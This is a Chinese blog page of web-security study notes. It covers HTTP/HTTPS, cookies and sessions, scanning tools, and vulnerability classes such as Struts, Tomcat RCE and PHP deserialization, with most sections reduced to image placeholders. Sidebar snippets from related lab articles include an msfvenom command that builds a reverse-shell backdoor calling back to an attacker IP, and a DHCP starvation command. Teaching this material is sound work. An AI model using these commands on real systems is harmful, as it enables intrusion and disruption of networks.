Web安全基础文章

最新推荐文章于 2024-05-04 18:05:50 发布
最新推荐文章于 2024-05-04 18:05:50 发布
阅读量1k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: web安全 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purvispanwu/article/details/127292791
版权

Web安全学习笔记,来源于B站
https://www.bilibili.com/video/BV1M3411r7Vp/?spm_id_from=333.788&vd_source=612c4bf24e38e359bfcb5233d4c10116

文章目录

0X01了解Web应用程序和相关风险

在这里插入图片描述

web服务器工作流程

客户端发送http请求,服务器收到请求后会做一个解析,看一下需不需要和后端数据库交互 如果需要的化会从数据库拿到对应的信息,动态的生成一个信息拼接到服务器的html网页中 然后再返回给浏览器 浏览器收到后会解析 解析完渲染出来就是我们看到的效果

web服务器组成
操作系统##### 软件(中间件)

apache、nginx、IIS

网页程序语言

生成html文档给浏览器
java、php、python

数据库

mysql、sql server

漏洞

在这里插入图片描述

0X02 搭建Web服务器

概述

在这里插入图片描述

0X03http协议

统一资源标识符 URI

在这里插入图片描述

http请求方法

在这里插入图片描述

http响应状态码

在这里插入图片描述

常见http响应报文头属性

在这里插入图片描述
在这里插入图片描述

http是无状态的协议

每一次都是新的请求

Cookie和Session

在这里插入图片描述

Cookie的属性

在这里插入图片描述

PHP中设置Cookie

在这里插入图片描述

创建Session会话在这里插入图片描述

find / -name session 找服务器上存储的session
在这里插入图片描述

0X04 https协议

http安全问题

在这里插入图片描述

https传输数据流程

在这里插入图片描述

0X05常见Web安全工具

GVM

在这里插入图片描述

AWVS

Web应用程序核心防御机制

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0X06 Web测试基础知识

知识树

在这里插入图片描述

测试应用程序

信息收集

在这里插入图片描述

公开来源收集

在这里插入图片描述

社会工程学收集

在这里插入图片描述

扫描收集

在这里插入图片描述

测试验证机制

在这里插入图片描述

测试会话管理

在这里插入图片描述

测试输入漏洞

在这里插入图片描述

测试逻辑漏洞

在这里插入图片描述

测试主机

测试配置漏洞

在这里插入图片描述

测试服务器软件漏洞

在这里插入图片描述

Web框架漏洞

什么是Web框架?

在这里插入图片描述
常见web框架
Spring、Struts、Django…

Struts框架漏洞简介与预防

在这里插入图片描述
防御
在这里插入图片描述
CVE
在这里插入图片描述

CMS漏洞

在这里插入图片描述
常见CMS
在这里插入图片描述

Tomcat 远程代码执行漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

中间件漏洞

什么是中间件?
在这里插入图片描述

IIS漏洞

HTTP.sys远程代码执行漏洞
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

PHP序列化和反序列化漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
示例
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Purvis_U
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全——基础知识(计算机网络part1)
学习记录
03-01 7993
一、OSI七层模型 应用层 Application:网络应用程序及应用层协议留存(message) 表示层 Presentation:使通信的应用程序能够释放交换数据的含义 会话层 Session:提供数据交换定界和同步功能,包括建立检查点和恢复方案 运输层 Transport:在应用程序端点间传送用应用层报文(segment) 网络层 Network:将数据报(datagram)从一台主机移动到另一台主机 链路层 Link:相邻网络节点间传递帧(frame) 物理层 Physical:比特从一个节点移
国科大web安全中期CTF.pdf
11-22
一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的安全措施。常见的Web安全威胁包括SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 二...
web安全详解(渗透测试基础
热门推荐
sunnygao的博客
11-20 2万+
文章目录一、Web基础知识1.http协议2.网络三种架构及特点3. Web应用的特点4.URL组成6.Http协议的性质7.请求响应报文的格式8.请求方法9.http缓存10.缓存新鲜度如何判断11.Http重定向原理以及状态码12.HTTPS协议 数字证书13.HTTPS协议与HTTP协议的区别?14. Web客户端的作用15.Web服务端作用16.集群环境的作用17.什么是Cookie,Cookie的作用。18.Cookie 的类型19.session的作用和原理Session的原理Session的两
Web安全基础
weixin_50906078的博客
04-16 3724
一、HTTP协议 1、HTTP 什么是HTTP? 超文本传输协议,HTTP是基于B/S架构进行通信的,而HTTP的服务器端实现程序有httpd、nginx等,其客户端的实现程序主要 是Web浏览器,例如Firefox、InternetExplorer、Google chrome、Safari、Opera等 HTTP是基于客户/服务器模式,且面向连接的。典型的HTTP事务处理有如下的过程 (1)客户与服务器建立连接; (2)客户向服务器提出请求; (3)服务器接受请求,并根据请求返回相应的文件作为应答; (4
网络安全最新Web服务器安全基础知识
最新发布
2401_84301948的博客
05-04 920
为了保护Web服务器和其中的Web应用程序,需要采取一系列安全措施。综上所述,Web服务器安全是保护Web服务器和其中托管的Web应用程序的一系列措施。为了保护Web服务器和Web应用程序的安全,需要采取一系列安全措施,包括实施访问控制、安装防火墙、更新和维护软件、实施加密措施以及监控和审计。
web安全基础
qq_37659794的博客
11-12 3378
web安全基础动手搭建第一个你的网站专业术语http协议功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 动手搭建第一个你的网站 phpstudy是一个php集成环境 一般网站套件组合 apache+php+mysql apache
一、web安全入门基础知识
weixin_45761101的博客
06-01 2万+
一、基础入门—概念名次 域名发现对应网安的意义? 一个网站的域名和他的子域名可能绑定于同一个IP地址,当我们进行漏洞扫描的时候他的主站没有找到漏洞那么我们就可以通过他子域名的网站绑定于同一个IP地址这个特点,对他的二级域名网站进行扫描,发现是否有漏洞,从而通过二级域名拿到主站的权限。 HOST文件和DNS有什么关系? 当我们进行IP地址解析的时候,我们电脑首先会通过本地host文件,去查找域名对应的IP地址。可以通过修改HOST文件当中的域名对应IP地址,例如让taobao.com对应的域名跳转到我们搭建的
WEB安全基础入门-概念名词
tjz991129的博客
01-09 2510
文章主要对WEB安全的基本入门做一个系统的概述及基本认识! 1、域名 域名即与IP地址一一对应的名称,网上有多个注册域名的网站如万网注册域名。 在域名中www.为顶级域名,其后为多级域名,在WEB安全中对多级域名的收集尤为重要,因为在打开一个网站的主网页时可能并不能发现什么漏洞,但是对它子域名所在的网页渗透时就可能存在漏洞,并且可能对整个网站也造成影响。简单来说,对多级域名的收集就是让你在渗透时有了更多的看可能。 2、DNS域名系统服务协议 DNS主要就是用于确定域名与IP之间一一对应的关系。 在这
web安全基础知识学习-part1
quan9i的博客
04-04 1472
web是什么web发展的阶段web安全漏洞web工作流程浏览器工作原理演示web通信URL作用HTTPHTTP报文HTTP请求方式HTTP请求头字段
Web安全原理及实践(基础部分)
YOU
07-15 3321
Web安全原理及实践(入门)Web安全基础Web安全概述Web安全基础常见渗透测试工具NmapBurpSuiteSqlmapSublime常见的漏洞扫描工具BurpsuiteScanner模块AWVSAPPscanNessus Web安全基础 Web安全概述 前提: 攻击者要想先攻击服务器之前,必须保证两者之间能进行正常的通信。 服务器上的各种服务都是依托于端口来实现对外提供服务,通过访问服务器对外开放的服务来攻击服务器。 匿名账号登录、口令爆破、Web漏洞利用、缓冲区溢出攻击…来入侵端口 搜索引擎的搜索技
Web安全检测平台关键技术研究与应用.pdf
06-07
总的来说,这篇论文针对Web安全检测平台的关键技术进行了深入研究,涵盖了心跳监听机制、报表技术、关联规则挖掘等方面,旨在构建一个全面、高效的Web安全防护体系。这些技术不仅有助于及时发现和防范网络安全威胁,...
白帽子讲web安全
03-02
1. **基础篇**:这一部分可能包括Web应用的基础架构和工作原理,如HTTP协议、HTML和JavaScript基础知识,这些都是理解Web安全基础。作者可能还会介绍Web应用开发中的常见错误和漏洞,如跨站脚本(XSS)和SQL注入等...
Web应用安全权威指南.pdf
08-15
该书从Web应用安全的基本概念开始,详细介绍了SQL注入、XSS、CSRF等Web安全攻击的原理和防御方法,并提供了详实的应用案例和代码。 该书的作者德丸浩是日本Web应用安全第一人,也是HASH咨询公司的董事长。他主要...
DHCP饿死攻击
purvispanwu的博客
04-10 4752
原理 如果需要进行DHCP饿死攻击,必须不断发送伪造不同的chaddr地址的dhcp discover消息来获取地址 漏洞分析 DHCP服务器向申请者分配IP地址时,无法区分正常的申请者与恶意的申请者 实现工具 kaili: Dhcpstarv工具 攻击命令 dhcpstarv -i [interface-name] 例子:dhcpstarv -i eth0 防御方式 dhcp snooping 开启dhcp snooping监听dhcp recover报文 [Huawei]dhcp
Sql注入-POST注入
purvispanwu的博客
12-19 2877
sql注入,网络安全
Windows默认共享IPC$攻击实践
purvispanwu的博客
05-02 1309
简介 IPC共享命名的管道资源,为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获得相应的去权限,远程管理计算机和检查计算机的共享资源时使用的. 如果远程服务器没有监听139或445端口,IPC$会话是无法建立的。 实验工具 nmap-探测机器服务和端口 kali-Hydra 暴力破解获取目标机器的账号密码 靶机 ip:192.168.1.2 版本:Windows server 2016 攻击机 ip:192.168.1.3 版本:Windows 7 攻击步骤 1. 利用nma
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1302
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
Web安全实践:工具篇
"Web安全实践完整版 - 书籍精华,涵盖Web安全实践方法和代码,适合论文和课题研究参考" 本文将深入探讨Web安全实践,介绍一些基础的工具和技术,帮助理解和提升在Web安全领域的实践能力。Web安全是网络安全的重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值